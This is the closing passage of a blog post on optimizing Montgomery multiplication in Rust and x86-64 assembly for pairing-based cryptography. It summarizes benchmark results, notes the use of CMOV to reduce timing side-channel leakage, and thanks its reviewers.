The baseline non-Montgomery multiplication function utilizing BigUint is shown in entry 3. The (non BigUint) Montgomery multiplication function developed in the prior post is entry 4. The benefits of actively managing the working set and unrolling the inner loops can be seen in entry 5. The benefit of the MULX intrinsic appears in entry 6. Pure assembly is shown in entry 7. While the assembly routine provides more than 15X performance improvement over the BigUint reference implementation in entry 3, it also utilizes the CMOV instructions in the final correction steps to reduce timing side-channel leakage relative to all other entries.

What we learned

We started with a reference multiplication routine utilizing the BigUint library crate as our performance baseline. Then we adapted the Montgomery multiplication function in Rust from the prior blog post into an equivalent x86-64 assembly language version that is over 15X faster than the baseline. Along the way we looked at how the micro-architecture supports increased parallelism, how several new instructions in the architecture also support increased parallelism, and got insight into how to use the instructions with planned register allocations. A few hints (leading to intentionally unanswered questions) were dropped regarding the potential of raw Rust and intrinsics, with further investigation left as an exercise for the reader. Finally, we benchmarked a broad range of approaches.

The code is available publicly on GitHub, self-contained and ready for further experimentation.

What is next?

As mentioned at the start, pairing-based cryptography involves a wide range of algorithms, techniques and optimizations. This will provide a large menu of follow-on optimization topics which may ultimately include the polynomial-related functionality that zkSNARKS utilize with pairings. Stay tuned!!

Thank you

The author would like to thank Parnian Alimi, Paul Bottinelli and Thomas Pornin for detailed review and feedback. The author is solely responsible for all remaining issues.

❌